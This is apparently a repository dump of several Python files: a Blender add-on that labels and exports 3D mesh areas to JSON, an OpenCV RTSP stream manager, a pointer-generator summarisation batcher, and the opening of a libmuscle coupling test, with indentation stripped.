### We define the clean function as removing all the areas of the object
def clean(self, context):
ob = bpy.context.active_object
me = ob.data
selfaces =[]
delmaterials =[]
delareas =[]
#check for edit mode
editmode = False
if ob.mode == 'EDIT':
editmode =True
#the following sets mode to object by default
bpy.ops.object.mode_set()
for f in me.polygons:
if f.select:
selfaces.append(f)
# for f in selfaces:
# hashSet for material_index
for f in selfaces:
i = 0
for a in ob.area_list:
if f.material_index == a.area_index and f.material_index not in delmaterials:
delmaterials.append(f.material_index)
delareas.append(i)
delareas.sort()
i = i + 1
for f in me.polygons:
if f.material_index in delmaterials:
f.material_index = 0
delareas.reverse()
q = 0
for j in delareas:
ob.area_list[delareas[q]].area_index = 0
q = q + 1
#done editing, restore edit mode if needed
if editmode:
bpy.ops.object.mode_set(mode = 'EDIT')
#selection = bpy.context.selected_objects
#obj = selection[0]
#for eachareaIndex in range(len(obj.area_list)):
# print("clean", eachareaIndex)
# obj.area_list.remove(0)
#mesh = obj.data
#mesh_editmode = bmesh.from_edit_mesh(mesh)
#for f in mesh_editmode.faces:
# if not f.material_index == 1 and not f.material_index == 2:
# f.material_index = 0
#print(obj.area_list)
def add(self, context):
selection = bpy.context.selected_objects
obj = selection[0]
mesh = obj.data
### We obtain the inputed values by the user
### to determine the name, description, gesture and color
### of the faces that the user selected to label
label = context.scene.inputLabel_hotarea
color = context.scene.inputColor_hotarea[:]
content = context.scene.inputContent_hotarea
gesture = context.scene.inputGesture_hotarea
### Activate edit mode to add label
mesh_editmode = bmesh.from_edit_mesh(mesh)
selected_faces = [p for p in mesh_editmode.faces if p.select]
### Error management if the user doesn't select at least 1 face
### of the model
if len(selected_faces) == 0:
bpy.ops.error.message('INVOKE_DEFAULT',
type="Error",
message='Please select at least one polygon')
return {'FINISHED'}
### We create a material with the color the user selected
### to add the new label
material = makeMaterial(name=label, diffuse=color[:3], alpha=color[3])
# create a mesh for the body
if len(mesh.materials) <= 0:
mesh.materials.append(makeMaterial(name="mainbody", diffuse=[1, 1, 1], alpha=1.0))
mesh.materials.append(material)
current_areas = []
for a in obj.area_list:
current_areas.append(a.area_index)
newMaterialIndex = len(mesh.materials) - 1
for f in selected_faces:
if newMaterialIndex in current_areas:
### If an area with this material index already exists in the model,
### we just assign the face to it
f.material_index = newMaterialIndex
else:
### Otherwise we create a new area, assign the face to it,
### and add the new area to the model's area list
obj.area_list.add()
current_areas.append(newMaterialIndex)
f.material_index = newMaterialIndex
obj.area_list[-1].area_index = newMaterialIndex
obj.area_list[-1].area_label = label
obj.area_list[-1].area_content = content
obj.area_list[-1].area_gesture = gesture
obj.area_list[-1].area_color = color
###############################################################################################
#### MAGIC_export operator class ########################
#### In this class we define the functions used to export the model ######################
#### module: Export and import #####################
###############################################################################################
class MAGIC_export(bpy.types.Operator):
bl_idname = "magic.export"
bl_label = "export"
def execute(self, context):
fileName = context.scene.export_path + context.scene.inputName_model
data = {}
obj = bpy.context.active_object # particular object by name
mesh = obj.data
## Obtaining vertices data
i = 0
Vertices = {}
for vert in mesh.vertices:
Vertices[i] = [vert.co.x,vert.co.y,vert.co.z]
i+=1
## Obtaining faces data
## remember to leave edit mode so
## changes reflect on the data <-- very important
j=0
Faces = {}
for face in mesh.polygons:
currentFace = []
currentNormal = []
Faces[j] = {}
for val in face.normal:
currentNormal.append(val)
for vert in face.vertices:
currentFace.append(vert)
Faces[j].update({'vertices':currentFace})
Faces[j].update({'normal':currentNormal})
j+=1
j=0
for face in mesh.polygons:
if obj.material_slots[face.material_index].name.startswith('mainBody'):
Faces[j].update({'area_index':0})
else :
Faces[j].update({'area_index':face.material_index})
j+=1
## Areas information, dictionary with the
## 5 values that compose an area data structure
j=0
Areas = {}
for a in obj.area_list:
Areas[j] = {}
Areas[j].update({'area_index': a.area_index})
Areas[j].update({'area_label': a.area_label})
Areas[j].update({'area_gesture': a.area_gesture})
Areas[j].update({'area_content':a.area_content})
color = [0,0,0,0]
color[0] = a.area_color[0]
color[1] = a.area_color[1]
color[2] = a.area_color[2]
color[3] = a.area_color[3]
Areas[j].update({'area_color':color})
j+=1
## Storing all the materials to avoid problems for now
j=0
Materials = {}
for mat in mesh.materials:
Materials[j] = {}
Materials[j].update({'name':mat.name})
Materials[j].update({'diffuse':mat.diffuse_intensity})
color = [0,0,0]
color[0] = mat.diffuse_color[0]
color[1] = mat.diffuse_color[1]
color[2] = mat.diffuse_color[2]
Materials[j].update({'color':color})
j+=1
### Find the verts for xyz surfaces to store in the json file
xz = []
yz = []
for polygon in mesh.polygons:
mat = obj.material_slots[polygon.material_index].material.name
if mat is not None:
if mat.startswith("xzFace"):
verts_in_xzFace = polygon.vertices[:]
for vert in verts_in_xzFace:
xz.append(list(obj.data.vertices[vert].co))
if mat.startswith("yzFace"):
verts_in_yzFace = polygon.vertices[:]
for vert in verts_in_yzFace:
yz.append(list(obj.data.vertices[vert].co))
## Storing data
data['vertices'] = Vertices
data['faces'] = Faces
data['materials'] = Materials
data['areas'] = Areas
data['xz'] = xz
data['yz'] = yz
data['modelname'] = context.scene.inputName_model
data['modeldescription'] = context.scene.inputIntroduction_model
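## For reference, the exported JSON roughly takes this shape (illustrative):
## {"vertices": {"0": [x, y, z], ...},
##  "faces": {"0": {"vertices": [...], "normal": [...], "area_index": 0}, ...},
##  "materials": {"0": {"name": ..., "diffuse": ..., "color": [r, g, b]}, ...},
##  "areas": {"0": {"area_index": ..., "area_label": ..., "area_gesture": ..., "area_content": ..., "area_color": [...]}, ...},
##  "xz": [...], "yz": [...], "modelname": "...", "modeldescription": "..."}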
thread = threading.Thread(target=writeFile, args=(fileName, data))
thread.start()
# wait here for the result to be available before continuing
thread.join()
with open(fileName + ".json", encoding='utf8') as json_file:
dataprocess = json.load(json_file, object_pairs_hook=OrderedDict)
blenderData = []
xyz = []
marked = []
unmarked = []
vertices = []
areas = []
modelInfo = []
faceMap = {}
pointMap = {}
modelInfo.append(context.scene.inputName_model)
modelInfo.append(context.scene.inputIntroduction_model)
xyz.append(data["xz"])
xyz.append(data["yz"])
blenderData.append(xyz)
areas = [dataprocess['areas']]
vertices = [dataprocess['vertices']]
faces = dataprocess['faces']
for f in faces:
if faces[f]['area_index'] == 0:
currentface = []
currentvertices = []
currentverticesindexes = []
currentnormal = []
for v in faces[f]['vertices']:
currentvertices.append(vertices[0][str(v)])
currentverticesindexes.append(str(v))
for v in faces[f]['normal']:
currentnormal.append(v)
faceMap[f] = currentverticesindexes
currentface.append(currentvertices)
currentface.append(currentnormal)
currentface.append(f)
unmarked.append(currentface)
else:
currentface = []
generalinfo = []
color = []
currentvertices = []
currentverticesindexes = []
currentnormal = []
areaindex = faces[f]['area_index'] - 1
for v in faces[f]['vertices']:
currentverticesindexes.append(str(v))
generalinfo.append(f)
generalinfo.append(areas[0][str(areaindex)]['area_label'])
generalinfo.append(areas[0][str(areaindex)]['area_content'])
generalinfo.append(areas[0][str(areaindex)]['area_gesture'])
generalinfo.append(str(areaindex))
color.append(areas[0][str(areaindex)]['area_color'])
for v in faces[f]['vertices']:
currentvertices.append(vertices[0][str(v)])
for v in faces[f]['normal']:
currentnormal.append(v)
faceMap[f] = currentverticesindexes
currentface.append(generalinfo)
currentface.append(color[0])
currentface.append(currentvertices)
currentface.append(currentnormal)
marked.append(currentface)
blenderData.append(marked)
blenderData.append(unmarked)
blenderData.append(modelInfo)
for faceIndex in iter(faceMap):
for pointIndex in faceMap.get(faceIndex):
if pointIndex not in pointMap:
pointMap[pointIndex] = set()
pointMap.get(pointIndex).add(faceIndex)
newdata = [blenderData, faceMap, pointMap]
thread = threading.Thread(target=writeFilePickle, args=(fileName, newdata))
thread.start()
# wait here for the result to be available before continuing
thread.join()
INPUTFILEADDRESS = fileName
OUTPUTFILEADDRESS = fileName + "processed.json"
modelData = blenderReader(INPUTFILEADDRESS)
FaceDict={}
index = 0
tempcount = 0
for eachFaceIndex in range(len(modelData.allFaces)):
eachFace = modelData.allFaces[eachFaceIndex]
templist = {}
templist['marked'] = eachFace.marked
if eachFace.marked:
templist['area_id'] = eachFace.area_id
templist['index'] = eachFaceIndex
templist['color'] = {"r":eachFace.blender_color[0],
"g":eachFace.blender_color[1],
"b": eachFace.blender_color[2]}
tempcount = tempcount +1
else:
templist['index'] = eachFaceIndex
templist['color'] = "null"
if eachFace.label == "Body":
eachFace.label = "m_body"
if eachFace.label == "Jet engine":
eachFace.label = "m_jet"
if eachFace.label == "Cockpit":
eachFace.label = "m_cockpit"
if eachFace.label == "unmarked":
eachFace.label = "nolabel"
eachFace.content = "please activate an element with label"
templist['label'] = eachFace.label
templist['content'] = eachFace.content
templist['normal'] = {"x":eachFace.normalConverted[0],
"y":eachFace.normalConverted[1],
"z": eachFace.normalConverted[2]}
templist['verts'] = dict(vert1={'x': eachFace.vertsConverted[0][0],
'y': eachFace.vertsConverted[0][1],
'z': eachFace.vertsConverted[0][2]
},
vert2={'x': eachFace.vertsConverted[1][0],
'y': eachFace.vertsConverted[1][1],
'z': eachFace.vertsConverted[1][2]
},
vert3={'x': eachFace.vertsConverted[2][0],
'y': eachFace.vertsConverted[2][1],
'z': eachFace.vertsConverted[2][2]
})
tempIndexes = {}
count = 0
for eachNearFace in eachFace.relatedFaces:
tempIndexes[str(count)] = eachNearFace
count = count + 1
templist['nearFaces'] = tempIndexes
FaceDict['face'+str(index)]= templist
index = index +1
ExportData = {
'modelName': modelData.generalInfo[0],
'modelIntro' : modelData.generalInfo[1],
'faces' : FaceDict
}
with open(OUTPUTFILEADDRESS, 'w') as outfile:
json.dump(ExportData, outfile)
return {'FINISHED'}
###############################################################################################
#### MAGIC_import operator class ########################
#### In this class we define the functions used to import the model #######################
#### module: Export and import #####################
###############################################################################################
class MAGIC_import(bpy.types.Operator):
bl_idname = "magic.import"
bl_label = "import"
def execute(self, context):
## IMPORTANT NOTE about the tracker scaffold: select the model after the scaffold so the materials are stored properly.
## Import file - Done
with open(context.scene.import_path) as json_file:
data = json.load(json_file, object_pairs_hook=OrderedDict)
## Add each vertex to a list - Done
Vertices = []
i=0
for p in data['vertices']:
p = data['vertices'][str(i)]
vector = mathutils.Vector((p))
Vertices.append(vector)
i+=1
## Add each face to a list - Done
Faces = []
i=0
for f in data['faces']:
f = data['faces'][str(i)]['vertices']
Faces.append(f)
i+=1
## Use file name to add the new mesh
NewMesh = bpy.data.meshes.new("newModel")
### We define how the mesh will be built
## Use both lists to build the model
NewMesh.from_pydata \
(
Vertices,
[],
Faces
)
NewMesh.update()
context = bpy.context
## Use file name again to link it
NewObj = bpy.data.objects.new("newModel", NewMesh)
### linking the new object to the scene
context.scene.objects.link(NewObj)
### We select the object to add the materials to the face, and also the areas.
context.scene.objects.active = NewObj
ob = bpy.context.object
current_mode = bpy.context.object.mode
### Check in which mode we are to handle errors
if current_mode != 'EDIT' :
bpy.ops.object.editmode_toggle()
### Object data
mesh = ob.data
### Here we start adding the materials
##material = makeMaterial(name=p.name, diffuse=p.color, alpha=p.diffuse)
##mesh.materials.append(material)
i=0
for p in data['materials']:
## Change all of this to makeMaterial when doing in main component
currentData = data['materials'][str(i)]
material = makeMaterial(name=currentData['name'], diffuse=currentData['color'], alpha=currentData['diffuse'])
mesh.materials.append(material)
i+=1
### Here we start adding the areas
i=0
for p in data['areas']:
currentData = data['areas'][str(i)]
ob.area_list.add()
ob.area_list[-1].area_index = currentData['area_index']
ob.area_list[-1].area_label = currentData['area_label']
ob.area_list[-1].area_content = currentData['area_content']
ob.area_list[-1].area_gesture = currentData['area_gesture']
ob.area_list[-1].area_color = currentData['area_color']
i+=1
### Here we paint all the faces depending on their index
mesh = ob.data
if bpy.context.object.mode != 'EDIT' :
bpy.ops.object.mode_set(mode='EDIT')
bpy.ops.mesh.remove_doubles(threshold=0.0001)
bm = bmesh.from_edit_mesh(mesh)
if hasattr(bm.faces, "ensure_lookup_table"):
bm.faces.ensure_lookup_table()
### We add the materials xzFace and yzFace to 2 specific faces in
### the scaffold to have a point of reference.
i=0
for f in data['faces']:
area_index = data['faces'][str(i)]['area_index']
bm.faces[i].material_index = area_index
i+=1
bpy.ops.mesh.select_all(action='SELECT')
bpy.ops.mesh.normals_make_consistent(inside=False)
bpy.ops.object.editmode_toggle()
return {'FINISHED'}
#
# Registration
# All panels and operators must be registered with Blender; otherwise
# they do not show up. The simplest way to register everything in the
# file is with a call to bpy.utils.register_module(__name__).
#
def register():
bpy.utils.register_module(__name__)
### We define the different scene properties that will be used
### to create the panel of the tool and accept user inputs
### for exporting and labelling.
bpy.types.Scene.inputName_model = bpy.props.StringProperty \
(
name="Model Name",
description="Name for the model",
default="Enter Name"
)
bpy.types.Scene.inputIntroduction_model = bpy.props.StringProperty \
(
name="Model Description",
description="Introduction for the model",
default="Enter Introduction"
)
bpy.types.Scene.inputLabel_hotarea = bpy.props.StringProperty \
(
name="Name",
description="Label for selected areas",
default="Enter Label"
)
bpy.types.Scene.inputContent_hotarea = bpy.props.StringProperty \
(
name="Description",
description="Content for selected areas",
default="Enter Content"
)
bpy.types.Scene.inputColor_hotarea = bpy.props.FloatVectorProperty(
name="Color",
subtype="COLOR",
size=4,
min=0.0,
max=1.0,
default=(0.75, 0.0, 0.8, 1.0)
)
bpy.types.Scene.inputGesture_hotarea = bpy.props.EnumProperty(
items=[('Select', 'Select', "", 3),
('Point', 'Point', "", 2),
('Cancel', 'Cancel', "", 1)],
name="Gesture")
# bpy.types.DATA_PT_display.append(hndl_draw)
bpy.types.Scene.export_path = bpy.props.StringProperty \
(
name="Output Directory",
default="",
description="Define the folder address to output the model",
subtype='DIR_PATH'
)
bpy.types.Scene.import_path = bpy.props.StringProperty \
(
name="Import File",
default="",
description="Define the file address to import the model",
subtype='FILE_PATH'
)
bpy.types.Scene.model_id = bpy.props.StringProperty \
(
name="Model ID",
default="",
description="Type in the model you want to load"
)
bpy.types.Scene.export_model = bpy.props.StringProperty \
(
name="STL directory",
default="",
description="Define the folder address of the destination",
subtype='DIR_PATH'
)
bpy.types.Scene.export_model_file = bpy.props.StringProperty \
(
name="STL filename",
default="",
description="Define the name of your STL file",
subtype='FILE_NAME'
)
bpy.types.Object.area_list = bpy.props.CollectionProperty(type=cls_AreaData)
def unregister():
bpy.utils.unregister_module(__name__)
del bpy.types.Scene.inputName_model
del bpy.types.Scene.inputIntroduction_model
del bpy.types.Scene.inputLabel_hotarea
del bpy.types.Scene.inputContent_hotarea
del bpy.types.Scene.inputColor_hotarea
del bpy.types.Scene.inputGesture_hotarea
del bpy.types.Scene.export_path
del bpy.types.Scene.import_path
del bpy.types.Scene.model_id
del bpy.types.Scene.export_model
del bpy.types.Scene.export_model_file
del bpy.types.Object.area_list
if __name__ == "__main__":
register()
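## Quick usage sketch (assuming this add-on file is installed and enabled in Blender;
## operator ids come from the bl_idname values defined above). From the Python console
## you could, for example, fill in scene.export_path and scene.inputName_model and call:
##     bpy.ops.magic.export()
## or invoke the other operators with their "operation" property, e.g.
##     bpy.ops.magic.hotarea(operation="add")
##     bpy.ops.magic.marker(operation="decimate")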
|
models.py
|
"""App models.
"""
import logging
import threading
import time
import cv2
from configs.general_configs import PRINT_THREAD
from ..cameras.utils import normalize_rtsp, verify_rtsp
from .exceptions import StreamOpenRTSPError
logger = logging.getLogger(__name__)
# Stream
KEEP_ALIVE_THRESHOLD = 10 # Seconds
# Stream Manager
STREAM_GC_TIME_THRESHOLD = 5 # Seconds
class Stream:
"""Stream Class"""
def __init__(self, rtsp, camera_id, part_id=None):
self.rtsp = normalize_rtsp(rtsp=rtsp)
self.camera_id = camera_id
self.part_id = part_id
self.last_active = time.time()
self.status = "init"
self.cur_img_index = 0
self.last_get_img_index = 1
self.id = id(self)
# test rtsp
if not verify_rtsp(self.rtsp):
raise StreamOpenRTSPError
self.cap = cv2.VideoCapture(self.rtsp)
self.last_img = self.cap.read()[1]
def update_keep_alive(self):
"""update_keep_alive."""
self.last_active = time.time()
def gen(self):
"""generator for stream."""
self.status = "running"
logger.info("Start streaming with %s.", self.rtsp)
while self.status == "running" and (
self.last_active + KEEP_ALIVE_THRESHOLD > time.time()
):
if not self.cap.isOpened():
raise StreamOpenRTSPError
has_img, img = self.cap.read()
# Need to add the video flag FIXME
if not has_img:
self.cap = cv2.VideoCapture(self.rtsp)
time.sleep(1)
continue
img = cv2.resize(img, None, fx=0.5, fy=0.5)
self.last_active = time.time()
self.last_img = img.copy()
self.cur_img_index = (self.cur_img_index + 1) % 10000
yield (
b"--frame\r\n"
b"Content-Type: image/jpeg\r\n\r\n"
+ cv2.imencode(".jpg", img)[1].tobytes()
+ b"\r\n"
)
self.cap.release()
logger.info("%s cap released.", self)
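# Note: gen() yields multipart JPEG frames. A typical (hypothetical) consumer wraps it in a
# streaming HTTP response with the matching boundary, e.g. in Django:
#   StreamingHttpResponse(stream.gen(),
#                         content_type="multipart/x-mixed-replace;boundary=frame")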
def get_frame(self):
"""get_frame."""
logger.info("%s get frame.", self)
# b, img = self.cap.read()
time_begin = time.time()
while True:
if time.time() - time_begin > 5:
break
if self.last_get_img_index == self.cur_img_index:
time.sleep(0.01)
else:
break
self.last_get_img_index = self.cur_img_index
img = self.last_img.copy()
# if b: return cv2.imencode('.jpg', img)[1].tobytes()
# else : return None
return cv2.imencode(".jpg", img)[1].tobytes()
def close(self):
"""close.
close the stream.
"""
self.status = "stopped"
logger.info("%s stopped.", self)
def __str__(self):
return f"<Stream id:{self.id} rtsp:{self.rtsp}>"
def __repr__(self):
return f"<Stream id:{self.id} rtsp:{self.rtsp}>"
class StreamManager:
"""StreamManager"""
def __init__(self):
self.streams = []
self.mutex = threading.Lock()
self.gc()
def add(self, stream: Stream):
"""add stream"""
self.mutex.acquire()
self.streams.append(stream)
self.mutex.release()
def get_stream_by_id(self, stream_id):
"""get_stream_by_id"""
self.mutex.acquire()
for i in range(len(self.streams)):
stream = self.streams[i]
if stream.id == stream_id:
self.mutex.release()
return stream
self.mutex.release()
return None
def gc(self):
"""Garbage collector
IMPORTANT, autoreloader will not reload threading,
please restart the server if you modify the thread
"""
def _gc(self):
while True:
self.mutex.acquire()
if PRINT_THREAD:
logger.info("streams: %s", self.streams)
to_delete = []
for stream in self.streams:
if stream.last_active + STREAM_GC_TIME_THRESHOLD < time.time():
# stop the inactive stream
# (the ones users didn't disconnect from)
logger.info("stream %s inactive", stream)
logger.info("Time now %s", time.time())
logger.info("Stream alive through %s", stream.last_active)
stream.close()
# collect the stream, to delete later
to_delete.append(stream)
for stream in to_delete:
self.streams.remove(stream)
self.mutex.release()
time.sleep(3)
threading.Thread(target=_gc, args=(self,), daemon=True).start()
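# Minimal usage sketch (the RTSP URL and camera id below are placeholders, not part of this app):
#   manager = StreamManager()
#   stream = Stream(rtsp="rtsp://host/stream", camera_id=1)
#   manager.add(stream)
#   frame_bytes = stream.get_frame()
#   stream.close()  # idle streams are also cleaned up by StreamManager.gc()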
|
batcher.py
|
# Most of this file is copied from https://github.com/abisee/pointer-generator/blob/master/batcher.py
import queue as Queue
import time
from random import shuffle
from threading import Thread
import numpy as np
import config
import data
import random
random.seed(1234)
class Example(object):
def __init__(self, article, abstract_sentences, vocab):
# Get ids of special tokens
start_decoding = vocab.word2id(data.START_DECODING)
stop_decoding = vocab.word2id(data.STOP_DECODING)
# Process the article
article_words = article.split()
if len(article_words) > config.max_enc_steps:
article_words = article_words[:config.max_enc_steps]
self.enc_len = len(article_words) # store the length after truncation but before padding
self.enc_input = [vocab.word2id(w) for w in article_words] # list of word ids; OOVs are represented by the id for UNK token
# Process the abstract
abstract = ' '.join(abstract_sentences)
abstract_words = abstract.split() # list of strings
abs_ids = [vocab.word2id(w) for w in abstract_words] # list of word ids; OOVs are represented by the id for UNK token
# Get the decoder input sequence and target sequence
self.dec_input, self.target = self.get_dec_inp_targ_seqs(abs_ids, config.max_dec_steps, start_decoding, stop_decoding)
self.dec_len = len(self.dec_input)
# If using pointer-generator mode, we need to store some extra info
if config.pointer_gen:
# Store a version of the enc_input where in-article OOVs are represented by their temporary OOV id; also store the in-article OOVs words themselves
self.enc_input_extend_vocab, self.article_oovs = data.article2ids(article_words, vocab)
# Get a version of the reference summary where in-article OOVs are represented by their temporary article OOV id
abs_ids_extend_vocab = data.abstract2ids(abstract_words, vocab, self.article_oovs)
# Overwrite decoder target sequence so it uses the temp article OOV ids
# NOTE: dec_input does not contain article OOV ids!!!!
_, self.target = self.get_dec_inp_targ_seqs(abs_ids_extend_vocab, config.max_dec_steps, start_decoding, stop_decoding)
# Store the original strings
self.original_article = article
self.original_abstract = abstract
self.original_abstract_sents = abstract_sentences
def get_dec_inp_targ_seqs(self, sequence, max_len, start_id, stop_id):
inp = [start_id] + sequence[:]
target = sequence[:]
if len(inp) > max_len: # truncate
inp = inp[:max_len]
target = target[:max_len] # no end_token
else: # no truncation
target.append(stop_id) # end token
assert len(inp) == len(target)
return inp, target
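# Worked example (illustrative): with sequence=[5, 6, 7], start_id=1, stop_id=2:
#   max_len=5 -> inp=[1, 5, 6, 7], target=[5, 6, 7, 2]   (stop token appended)
#   max_len=3 -> inp=[1, 5, 6],    target=[5, 6, 7]      (truncated, no stop token)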
def pad_decoder_inp_targ(self, max_len, pad_id):
while len(self.dec_input) < max_len:
self.dec_input.append(pad_id)
while len(self.target) < max_len:
self.target.append(pad_id)
def pad_encoder_input(self, max_len, pad_id):
while len(self.enc_input) < max_len:
self.enc_input.append(pad_id)
if config.pointer_gen:
while len(self.enc_input_extend_vocab) < max_len:
self.enc_input_extend_vocab.append(pad_id)
class Batch(object):
def __init__(self, example_list, vocab, batch_size):
self.batch_size = batch_size
self.pad_id = vocab.word2id(data.PAD_TOKEN) # id of the PAD token used to pad sequences
self.init_encoder_seq(example_list) # initialize the input to the encoder
self.init_decoder_seq(example_list) # initialize the input and targets for the decoder
self.store_orig_strings(example_list) # store the original strings
def init_encoder_seq(self, example_list):
# Determine the maximum length of the encoder input sequence in this batch
max_enc_seq_len = max([ex.enc_len for ex in example_list])
# Pad the encoder input sequences up to the length of the longest sequence
for ex in example_list:
ex.pad_encoder_input(max_enc_seq_len, self.pad_id)
# Initialize the numpy arrays
# Note: our enc_batch can have different length (second dimension) for each batch because we use dynamic_rnn for the encoder.
self.enc_batch = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
self.enc_lens = np.zeros((self.batch_size), dtype=np.int32)
self.enc_padding_mask = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.float32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.enc_batch[i, :] = ex.enc_input[:]
self.enc_lens[i] = ex.enc_len
for j in range(ex.enc_len):
self.enc_padding_mask[i][j] = 1
# For pointer-generator mode, need to store some extra info
if config.pointer_gen:
# Determine the max number of in-article OOVs in this batch
self.max_art_oovs = max([len(ex.article_oovs) for ex in example_list])
# Store the in-article OOVs themselves
self.art_oovs = [ex.article_oovs for ex in example_list]
# Store the version of the enc_batch that uses the article OOV ids
self.enc_batch_extend_vocab = np.zeros((self.batch_size, max_enc_seq_len), dtype=np.int32)
for i, ex in enumerate(example_list):
self.enc_batch_extend_vocab[i, :] = ex.enc_input_extend_vocab[:]
def init_decoder_seq(self, example_list):
# Pad the inputs and targets
for ex in example_list:
ex.pad_decoder_inp_targ(config.max_dec_steps, self.pad_id)
# Initialize the numpy arrays.
self.dec_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
self.target_batch = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.int32)
self.dec_padding_mask = np.zeros((self.batch_size, config.max_dec_steps), dtype=np.float32)
self.dec_lens = np.zeros((self.batch_size), dtype=np.int32)
# Fill in the numpy arrays
for i, ex in enumerate(example_list):
self.dec_batch[i, :] = ex.dec_input[:]
self.target_batch[i, :] = ex.target[:]
self.dec_lens[i] = ex.dec_len
for j in range(ex.dec_len):
self.dec_padding_mask[i][j] = 1
def store_orig_strings(self, example_list):
self.original_articles = [ex.original_article for ex in example_list] # list of lists
self.original_abstracts = [ex.original_abstract for ex in example_list] # list of lists
self.original_abstracts_sents = [ex.original_abstract_sents for ex in example_list]
class Batcher(object):
BATCH_QUEUE_MAX = 10 # max number of batches the batch_queue can hold
def __init__(self, data_path, vocab, mode, batch_size, single_pass):
self._data_path = data_path
self._vocab = vocab
self._single_pass = single_pass
self.mode = mode
self.batch_size = batch_size
# Initialize a queue of Batches waiting to be used, and a queue of Examples waiting to be batched
self._batch_queue = Queue.Queue(self.BATCH_QUEUE_MAX)
self._example_queue = Queue.Queue(self.BATCH_QUEUE_MAX * self.batch_size)
# Different settings depending on whether we're in single_pass mode or not
if single_pass:
self._num_example_q_threads = 1 # just one thread, so we read through the dataset just once
self._num_batch_q_threads = 1 # just one thread to batch examples
self._bucketing_cache_size = 1 # only load one batch's worth of examples before bucketing; this essentially means no bucketing
self._finished_reading = False # this will tell us when we're finished reading the dataset
else:
self._num_example_q_threads = 1 #16 # num threads to fill example queue
self._num_batch_q_threads = 1 #4 # num threads to fill batch queue
self._bucketing_cache_size = 1 #100 # how many batches-worth of examples to load into cache before bucketing
# Start the threads that load the queues
self._example_q_threads = []
for _ in range(self._num_example_q_threads):
self._example_q_threads.append(Thread(target=self.fill_example_queue))
self._example_q_threads[-1].daemon = True
self._example_q_threads[-1].start()
self._batch_q_threads = []
for _ in range(self._num_batch_q_threads):
self._batch_q_threads.append(Thread(target=self.fill_batch_queue))
self._batch_q_threads[-1].daemon = True
self._batch_q_threads[-1].start()
# Start a thread that watches the other threads and restarts them if they're dead
if not single_pass: # We don't want a watcher in single_pass mode because the threads shouldn't run forever
self._watch_thread = Thread(target=self.watch_threads)
self._watch_thread.daemon = True
self._watch_thread.start()
def next_batch(self):
# If the batch queue is empty, print a warning
if self._batch_queue.qsize() == 0:
#tf.logging.warning('Bucket input queue is empty when calling next_batch. Bucket queue size: %i, Input queue size: %i', self._batch_queue.qsize(), self._example_queue.qsize())
if self._single_pass and self._finished_reading:
#tf.logging.info("Finished reading dataset in single_pass mode.")
return None
batch = self._batch_queue.get() # get the next Batch
return batch
def fill_example_queue(self):
input_gen = self.text_generator(data.example_generator(self._data_path, self._single_pass))
while True:
try:
(article, abstract) = next(input_gen) # read the next example from file. article and abstract are both strings.
except StopIteration: # if there are no more examples:
if self._single_pass:
self._finished_reading = True
break
else:
raise Exception("single_pass mode is off but the example generator is out of data; error.")
# abstract_sentences = [sent.strip() for sent in data.abstract2sents(abstract)] # Use the <s> and </s> tags in abstract to get a list of sentences.
# abstract = str(abstract, encoding='utf8')
abstract_sentences = [abstract]
example = Example(article, abstract_sentences, self._vocab) # Process into an Example.
self._example_queue.put(example) # place the Example in the example queue.
def fill_batch_queue(self):
while True:
if self.mode == 'decode':
# beam search decode mode single example repeated in the batch
ex = self._example_queue.get()
b = [ex for _ in range(self.batch_size)]
self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
else:
# Get bucketing_cache_size-many batches of Examples into a list, then sort
inputs = []
for _ in range(self.batch_size * self._bucketing_cache_size):
inputs.append(self._example_queue.get())
inputs = sorted(inputs, key=lambda inp: inp.enc_len, reverse=True) # sort by length of encoder sequence
# Group the sorted Examples into batches, optionally shuffle the batches, and place in the batch queue.
batches = []
for i in range(0, len(inputs), self.batch_size):
batches.append(inputs[i:i + self.batch_size])
if not self._single_pass:
shuffle(batches)
for b in batches: # each b is a list of Example objects
self._batch_queue.put(Batch(b, self._vocab, self.batch_size))
def watch_threads(self):
while True:
# tf.logging.info(
# 'Bucket queue size: %i, Input queue size: %i',
# self._batch_queue.qsize(), self._example_queue.qsize())
time.sleep(60)
for idx,t in enumerate(self._example_q_threads):
if not t.is_alive(): # if the thread is dead
#tf.logging.error('Found example queue thread dead. Restarting.')
new_t = Thread(target=self.fill_example_queue)
self._example_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
for idx,t in enumerate(self._batch_q_threads):
if not t.is_alive(): # if the thread is dead
#tf.logging.error('Found batch queue thread dead. Restarting.')
new_t = Thread(target=self.fill_batch_queue)
self._batch_q_threads[idx] = new_t
new_t.daemon = True
new_t.start()
def text_generator(self, example_generator):
while True:
try:
e = next(example_generator) # e is a tf.Example
article_text = e.features.feature['article'].bytes_list.value[0].decode() # the article text was saved under the key 'article' in the data files
abstract_text = e.features.feature['abstract'].bytes_list.value[0].decode() # the abstract text was saved under the key 'abstract' in the data files
except ValueError:
# tf.logging.error('Failed to get article or abstract from example')
continue
except StopIteration:
# tf.logging.info("The example generator for this example queue filling thread has exhausted data.")
break
if len(article_text)==0: # See https://github.com/abisee/pointer-generator/issues/1
# tf.logging.warning('Found an example with empty article text. Skipping it.')
continue
else:
yield (article_text, abstract_text)
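# Usage sketch (hedged): the surrounding project is expected to provide a Vocab and a path to
# tf.Example-formatted data; the exact attribute names below are assumptions, not verified here.
#   vocab = data.Vocab(config.vocab_path, config.vocab_size)
#   batcher = Batcher(config.train_data_path, vocab, mode='train',
#                     batch_size=config.batch_size, single_pass=False)
#   batch = batcher.next_batch()  # blocks until a Batch is ready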
|
test_cpp_macro_micro.py
|
import multiprocessing as mp
from pathlib import Path
import subprocess
import sys
import numpy as np
from libmuscle import Instance, Message
from ymmsl import Operator
from .conftest import skip_if_python_only
def run_macro(instance_id: str):
sys.argv.append('--muscle-instance={}'.format(instance_id))
macro()
def macro():
instance = Instance({
Operator.O_I: ['out'],
Operator.S: ['in']})
while instance.reuse_instance():
# f_init
assert instance.get_setting('test1') == 13
for i in range(2):
# o_i
test_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
assert test_array.shape == (2, 3)
assert test_array.flags.c_contiguous
data = {
'message': 'testing',
'test_grid': test_array}
instance.send('out', Message(i * 10.0, (i + 1) * 10.0, data))
# s/b
msg = instance.receive('in')
assert msg.data['reply'] == 'testing back {}'.format(i)
assert msg.data['test_grid'].array.dtype.kind == 'i'
